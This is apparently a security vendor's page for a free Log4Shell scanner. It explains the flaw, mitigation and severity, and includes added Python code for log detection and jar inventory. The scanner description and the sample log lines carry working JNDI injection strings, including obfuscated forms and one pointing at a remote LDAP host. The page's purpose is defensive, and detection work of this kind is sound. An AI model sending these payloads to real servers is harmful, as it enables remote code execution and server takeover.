Log4j Scanner (CVE-2021-44228 - Log4Shell vulnerability)
This free Log4j vulnerability scanner checks if CVE-2021-44228 - aka the Log4Shell vulnerability - affects your target.
Unauthenticated attackers can exploit this high-risk security issue to gain Remote Code Execution and fully compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
If you’d like to detect other vulnerabilities, this free tool is part of the premium version of our Network Vulnerability Scanner, whose Deep Scan option identifies over 11.000 CVEs. For full access to it and 20+ other tools, check out our pricing plans.
What is the Log4j vulnerability (CVE-2021-44228)
The Log4j vulnerability stems from improper input validation in the JNDI functionality of Apache Log4j versions 2.14.1 and earlier. The "message lookup substitution" feature, enabled by default in these versions, allows attackers to load and execute arbitrary Java code from a remote LDAP server.
What makes this an even bigger problem for security teams is that JNDI lookups support multiple protocols, including LDAP, LDAPS, DNS, and RMI.
Therefore, if an attacker can control the log messages and inject a JNDI lookup string via input parameters or HTTP headers, they can point that lookup at a malicious Java class hosted on a server they control.
The vulnerable server would then resolve the lookup and load and execute this malicious Java class from the attacker's LDAP/LDAPS/DNS/RMI server.
How we detect the Log4j vulnerability (CVE-2021-44228)
This Log4j vulnerability scanner uses a payload like: ${jndi:dns://${hostName}.private-dns-server}
or ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://{hostName}.private-dns-server}
and injects it into the URL or custom headers.
To scan for Log4j, this tool uses some of the detection capabilities from our Network Vulnerability Scanner, but the paid version of our Website Vulnerability Scanner can also find the Log4j vulnerability.
The Website Scanner inserts the payload in various locations within the target application, including the Base URL, HTTP headers (over 50 headers), and all input fields in HTML forms (e.g., username, search, etc.), which it discovers by crawling the app. If the application is vulnerable, the Log4j checker mechanism will trigger a DNS request to one of the private DNS servers hosted in our cloud environment.
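The same lookup forms the scanner injects are what a defender wants to spot in web server logs or at a WAF. The following detection logic is an added example, not part of this page or of the scanner: it URL-decodes a value, collapses the `${::-j}`-style and `${lower:J}`-style lookup obfuscation from the inside out, and then matches the resulting `${jndi:<protocol>:` prefix. The log lines are constructed samples.

```python
import re
import urllib.parse

# Obfuscation tricks seen in Log4Shell probes that hide the literal "jndi":
#   ${::-j}        lookup with an empty name whose default value is "j"
#   ${env:NOPE:-j} default value of a lookup that does not resolve
#   ${lower:J}     case-conversion lookup (both cases folded to lower here,
#                  since the final match is case-insensitive anyway)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# Protocol handlers the JNDI lookup accepts (the page names LDAP, LDAPS, DNS, RMI).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(value: str) -> str:
    """URL-decode, then collapse nested lookups inside-out until nothing changes."""
    value = urllib.parse.unquote(value)
    for _ in range(10):  # bounded: real probes nest only a few levels
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), value)
        collapsed = _DEFAULT_VALUE.sub(lambda m: m.group(1), collapsed)
        if collapsed == value:
            break
        value = collapsed
    return value


def is_log4shell_probe(value: str) -> bool:
    """True if the value resolves to a ${jndi:<protocol>:...} lookup."""
    return _JNDI.search(normalize(value)) is not None


# Constructed access-log lines (not real traffic): a benign request, a plain
# probe in the query string, the obfuscated DNS payload from the text above
# placed in the User-Agent, and a URL-encoded probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /?q=${jndi:ldap://198.51.100.7/a} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://${hostName}.private-dns-server}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fx%7D HTTP/1.1" 200 12 "-" "-"',
]


def flag_lines(lines):
    """Indexes of log lines that carry a Log4Shell-style lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in flag_lines(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i])}")
```

Matching on the normalized form rather than the raw text is what keeps the `${::-j}` variant from slipping past a plain "jndi" string search.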
If you’re interested in even more details about this, we explained how to check for the Log4j vulnerability in a dedicated article.
Log4j vulnerability (CVE-2021-44228) severity
Even though it’s been a few years since CVE-2021-44228 emerged in December 2021, many security and IT folks are still looking for quick ways to scan for the Log4j vulnerability. That’s because this security issue has the maximum CVSSv3 score of 10 (Critical severity) and it is included in the Known Exploited Vulnerabilities catalog from the Cybersecurity and Infrastructure Security Agency (CISA).
How to fix the Log4j vulnerability - CVE-2021-44228 mitigation
We recommend updating the Log4j library to at least version 2.17.1.
This version not only fixes the vulnerability but also addresses additional security issues found after the initial patch. The initial fix was incomplete in certain non-default configurations, which is why CVE-2021-45046 appeared.
If you’ve already applied the initial fix and are unsure whether the subsequent Log4j RCE (CVE-2021-45046) persists in your systems, you can use the Deep Scan option of our Network Vulnerability Scanner (paid) to run another test and confirm - or disprove - it.
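Updating is only possible once you know where log4j-core actually sits on disk. The following inventory check is an added example, not part of this page or of the scanner: it reads the Maven metadata entry that log4j-core jars carry and flags any version below the 2.17.1 threshold recommended above. The jar produced by make_test_jar is a constructed stand-in with no classes in it.

```python
import io
import re
import zipfile
from pathlib import Path

# Maven-built log4j-core jars carry their version in this metadata entry.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_VERSION = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?$")

def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1, 1, ''); '2.0-beta9' sorts below the 2.0 release."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    major, minor, patch, tag = m.groups()
    nums = (int(major), int(minor), int(patch or 0))
    return nums + ((0, tag) if tag else (1, ""))  # pre-release tag < final

FIXED = parse_version("2.17.1")  # threshold the page recommends

def log4j_core_version(jar_bytes: bytes):
    """Version declared in the jar's Maven metadata, or None if it is not log4j-core."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        if POM_PROPS not in jar.namelist():
            return None
        for line in jar.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None

def needs_upgrade(version: str) -> bool:
    return parse_version(version) < FIXED

def scan_dir(root: str):
    """(path, version) for every log4j-core jar under root that is below 2.17.1."""
    findings = []
    for path in Path(root).rglob("*.jar"):
        version = log4j_core_version(path.read_bytes())
        if version and needs_upgrade(version):
            findings.append((str(path), version))
    return findings

def make_test_jar(version=None) -> bytes:
    """Constructed stand-in jar: only the Maven metadata entry, no classes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            jar.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()
```

Fat or shaded jars that bundle log4j-core under a relocated package do not carry this metadata entry and need a class-level search instead.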
Log4j detection references
Log4Shell scanner report
Now that you’ve found how to scan for the Log4j vulnerability quickly and at zero cost, maybe you’re curious what you’ll get after the scan finishes.
Here’s a sample report from our free Log4j vulnerability scanner, which you can export as PDF. This is the kind of proof and remediation advice you’ll get if our Log4j vulnerability scanner finds any vulnerable systems in your infrastructure:
About our Network Vulnerability Scanner
Our Network Vulnerability Scanner is a well-rounded tool for all your network security assessments.
It combines multiple engines and fine-tuned (customizable) scan settings which surface over 20.000 critical vulnerabilities, misconfigurations, and outdated services.
Each scan automatically updates your attack surface and provides an up-to-date map for planning targeted attacks or strategic lateral movements.
In a transparent benchmark, our tool outperformed the 6 most popular network scanners on the market, both open-source and commercial.
Explore a sample report which includes a vulnerability summary, automatically confirmed findings, evidence, and more.
FAQ
What is Log4j?
Log4j is a popular logging library used by many applications and services. It's one of several Java logging frameworks and is part of the Apache Logging Services, a project under the Apache Software Foundation.
What is the Log4shell attack surface?
According to this repository, the following organizations have been confirmed to have systems vulnerable to CVE-2021-44228, the notorious Log4j vulnerability: Apple, Google, LinkedIn, Webex, Tencent, Steam, Twitter, Baidu, DiDi, JD, NetEase, Cloudflare, Amazon, Tesla, Apache Solr, Apache Druid, Apache Struts2, IBM QRadar SIEM, Palo Alto Panorama, Elasticsearch, Ghidra, Minecraft, PulseSecure, UniFi, VMware, Blender.
Which are the vulnerable Log4j versions?
All Log4j versions before 2.17.1 are vulnerable.
On any of these versions, a remote attacker, without needing any authentication, can completely take over the server.
Why are you offering a free Log4j vulnerability scanner?
Every day, we develop tools, detections, and exploits to help ethical hackers enhance organizational defenses.
We know the fight is unfair and rigged; security people follow strict rules, while threat actors do anything they want.
That's why our team dissects vulnerabilities and creates tools (sometimes free ones), so cybersecurity specialists can do good and counteract the damage criminals cause with their own methods.
Read more in our vulnerability research manifesto.